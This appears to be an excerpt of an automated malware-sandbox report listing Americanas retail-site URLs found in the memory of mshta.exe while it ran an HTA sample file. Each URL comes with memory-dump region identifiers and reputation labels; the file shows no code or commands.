                                                                                        https://www.americanas.com.br/categoria/tv-e-home-theater/tv/g/marca-LG/marca-Lg/marca-lg?viewMode=lmshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402328770.000000000AC1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngendmshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.pngmshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463690570.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444617125.00000000094C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.pnggdmshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://empresas.americanas.com.br/hotsite/empresas-cotacao-online?chave=menuacom_aemp_cotacoesmshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.0000000009473000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484186260.0000000009474000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                  unknown
                                                                                                  https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-b2wadmshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443295751.00000000093E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459421880.000000000AC41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401639777.000000000AC39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409699291.000000000AAB5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://www.americanas.com.br/categoria/eletroportateis/maquina-de-costura?chave=pfm_hm_tt_1_0_maquimshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.000000000946C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                      high
                                                                                                      https://www.americanas.com.br/hotsite/servicos/home?chave=dk_hm_branding_servicosKmshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.png.mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.americanas.com.br/categoria/beleza-e-perfumaria?chave=pfm_home_beleza_menumshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                            high
                                                                                                            https://sacola.americanas.com.br/filler-v2mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://www.americanas.com.br/busca/panetone-bauducco/cmshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.americanas.com.br/categoria/malas-mochilas-e-acessorios?chave=pfm_home_malas_menumshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25437694925.0000000009C5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398339352.0000000009C5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488441042.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422811267.0000000009C5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.americanas.com.br/categoria/brinquedos?chave=pfm_home_brinquedos_menumshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410331977.000000000ABF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.americanas.com.br/especial/afiliados?chave=dk_hm_ft_00_02_afiliadosmshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://images-americanas.b2w.io/spacey/acom/2024/12/02/topinho-desk-1296x54-bd34177535b9.png3f6b.wemshta.exe, 00000000.00000003.25458620748.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484951411.0000000009561000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.americanas.com.br/hotsite/destaque-telefonia?chave=dk_hm_dt_2_4_telefoniamshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                          high
                                                                                                                          https://www.americanas.com.br/busca/ar-condicionado-split-9000-btusmshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487080902.000000000AAF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404840319.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25441922938.0000000009921000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403359290.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=pfm_home_suplementos_menumshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.americanas.com.br/cartao-americanaswindow.__APOLLO_STATE__.ROOT_QUERY.publication(mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-e904efa9812b.pngwmshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
